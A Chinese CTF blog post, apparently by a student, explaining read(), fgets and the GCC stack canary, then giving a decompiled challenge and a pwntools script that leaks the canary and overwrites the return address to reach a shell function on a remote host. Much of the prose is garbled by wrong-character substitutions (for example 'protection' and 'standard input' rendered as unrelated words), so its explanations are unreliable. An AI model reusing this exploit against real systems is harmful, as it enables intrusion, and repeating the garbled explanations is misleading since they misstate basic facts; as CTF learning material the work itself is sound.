呜啦啦,这次是canary,预料得进度比拟快
理解了一些函数的应用原理,来这里写一下
read()
extern ssize_t read (int __fd, void *__buf, size_t __nbytes);
1.参数一为被读取的文件对应的文件描述符,第二个参数为缓存区,第三个参数为读取的字节数2.性能:读取fd对应的文件,并将读取的数据保留到buf,以nbytes为读取单位3.返回值:返回读取的字节数,-1示意读取失败,0示意读取完结其中,fd是依据调用关上函数获取的文件描述符。此参数是一个可为0、1或2整数值,其值别离代表了规范输出、规范输入和规范谬误。sendafter(“”,payload),
因为校赛学到的一个函数,在于准确地填充栈,“”内是承受的具体内容,再也不必recvuntil了。char fgets ( char str, int num, FILE * stream );
fgets函数性能为从指定的流中读取每次读取一行。从指定的流 stream 读取一行,并把它存储在 str 所指向的字符串内。当读取 (n-1) 个字符时,或者读取到换行符时,或者达到文件开端时,它会进行先来说一下爱护机制吧
canary栈爱护
为了避免歹意的泄露,gcc采纳了一种爱护机制叫canary,通过在返回地址和原bp地址后面插入了一段长为8的随机字符。并且在data段有一份正本,函数返回前将随机字符的地位和正本比拟,看是否有歹意攻打
留神有0截断,不然无奈读出。
以上
放一道题
`
int __cdecl main(int argc, const char **argv, const char **envp){ int v4; // [rsp+Ch] [rbp-24h] char buf; // [rsp+10h] [rbp-20h] unsigned __int64 v6; // [rsp+28h] [rbp-8h] v6 = __readfsqword(0x28u); setbuf(stdout, 0LL); setbuf(stderr, 0LL); setbuf(stdin, 0LL); signal(14, sig_handler); alarm(5u); puts("Welcome to your first canary test!"); puts("length?"); __isoc99_scanf("%d", &v4); if ( v4 < 0 || v4 > 32 ) { puts("TOO LONG!"); exit(-1); } puts("what?"); read(0, &buf, v4); puts(&buf); puts("OK!"); read(0, &buf, 0x30uLL); return 0;}`
WA
from pwn import*p=remote('121.196.34.30',10000)##ip,加端口p.sendlineafter('length?\n','32')payload='a'*24##利用ida查看地位要减8,因为有canaryp.sendlineafter('what?\n',payload)##因为有0截断,所以多发一个p.recvuntil('a'*24+'\n')canary='\x00'+p.recv(7)shell_addr=p64(0x400885)##用ida或者间接函数寻找payload='a'*24+canary+p64(0)+shell_addrp.sendlineafter('OK!\n',payload)p.interactive()绕开的要害是,有俩次从输出流读取的机会,第一次是失去canary,第二次才是绕过,还有put函数。(比方文中的俩次read)。
其余危险函数
(小声bb 我的英语好烂 如果您可怜看到了这篇文章,有任何疑难欢送提出一起交换,不要骂我,我只是个会写点页面的渣渣)